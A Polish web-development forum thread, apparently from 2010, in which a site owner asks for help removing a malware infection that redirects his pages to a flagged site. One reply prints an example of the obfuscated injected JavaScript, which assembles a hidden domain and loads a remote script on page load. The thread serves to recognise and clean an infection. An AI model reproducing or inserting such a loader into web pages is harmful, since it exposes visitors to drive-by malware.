Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Strona jako dokonująca ataków! + Prośba o Pomoc., HELP :(
kamykthm
post
Post #1





Grupa: Zarejestrowani
Postów: 45
Pomógł: 0
Dołączył: 12.08.2009

Ostrzeżenie: (0%)
-----

Witam, dostał mi się jakiś robal na ftp'a i dostaje po oczach taki komunikat:

Strona zgłoszona jako dokonująca ataków!

Strona wwww.artrent.in została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.

Wywołuje w/w strone z chwilą gdy na domenie nie ma głównego pliku index.* lub katalogu (każdy wie o co chodzi)

Przyznam szczerze że w pewnym okresie czasu dużo osób miało dostęp do ftp'a, ale nie do całego tylko do określonych katalogów, z tym że tam nic nie znalazłem. Szukałem również w innych plikach złośliwego kodu, ale bez skutku. Stąd moje pytanie czy ktoś ma jakiś pomysł aby to g...o usunąć. Mam na ftp'ie ponad 15GB danych, php + html + js etc. Przeskanowanie tego wszystkiego plik po pliku (a tak doradzili mi w home, bo mam tak hosting + podeślą logi i kazali zaktualizować cmy) zajmie mi chyba z rok ;/

I moje drugie pytanie, czy istnieje narzędzie/program aby przeskanował określone pliki php/html i wyszukał określoną skłądnie/kod ?

Proszę o HELP.
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Wiktor P.
post
Post #2





Grupa: Zarejestrowani
Postów: 80
Pomógł: 9
Dołączył: 14.09.2009

Ostrzeżenie: (0%)
-----

Cytat(kamykthm @ 14.06.2010, 18:41:07 ) *
Możecie podać przykładowy dopisywany kod ?

[HTML] pobierz, plaintext 
  1. <script> 
  2. try
  3. {window.onload=function()
  4. {
  5. document.write('<div id=megaid>opera-com.mercadolibre.co</div>');Z2actjidmypp = document.getElementById('megaid').innerHTML + 'm@!.(m#)&x&@.!)&v&&k$&^)o)n^@!t!& 
  6.  
  7. (...)
  8.  
  9. m#@^/!)'.replace(/#|\(|\$|\)|\^|\!|@|
  10. &/ig, '') ;document.write('<scr'+'ipt src=http://'+Z2actjidmypp.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');
  11. } 
  12. }  catch(Lozwklx ) {}
  13. </script>
  14.  
  15. <!--2587ada5e557ba7c3bd1e13bcc3aa4c8-->
[HTML] pobierz, plaintext


A jeśli chodzi o zgłoszenie prośby do Google o ponowne sprawdzenie strony, to linka nie podam gdzie to się robi, bo nie pamiętam.
Ale w moim przypadku czekałem na interwencję około 48h więc bardzo krótko.

W kwestii Linuksa, jako grafik możesz mieć drugi system i na nim używać klienta ftp.
Polecam Ubuntu Studio. To jest dystrybucja właśnie dla grafików.

Ten post edytował Wiktor P. 14.06.2010, 17:55:37
Go to the top of the page
+Quote Post

Posty w temacie
- kamykthm   Strona jako dokonująca ataków! + Prośba o Pomoc.   14.06.2010, 16:15:00
- - fifi209   Cytat(kamykthm @ 14.06.2010, 17:15:00...   14.06.2010, 17:16:29
- - Wiktor P.   To jest bardzo częsty problem. Właściwie to masz g...   14.06.2010, 17:24:03
- - kamykthm   Co do haseł to już pozmieniałem wszystkie, co do m...   14.06.2010, 17:41:07
- - Wiktor P.   Cytat(kamykthm @ 14.06.2010, 18:41:07...   14.06.2010, 17:52:52
- - kamykthm   Cytat(fifi209 @ 14.06.2010, 18:16:29 ...   14.06.2010, 18:10:11
- - konfeusz   ... sie wtrace... tak jak napisal Wiktor, w 99% pr...   16.06.2010, 08:36:07

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 4.10.2025 - 14:31
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn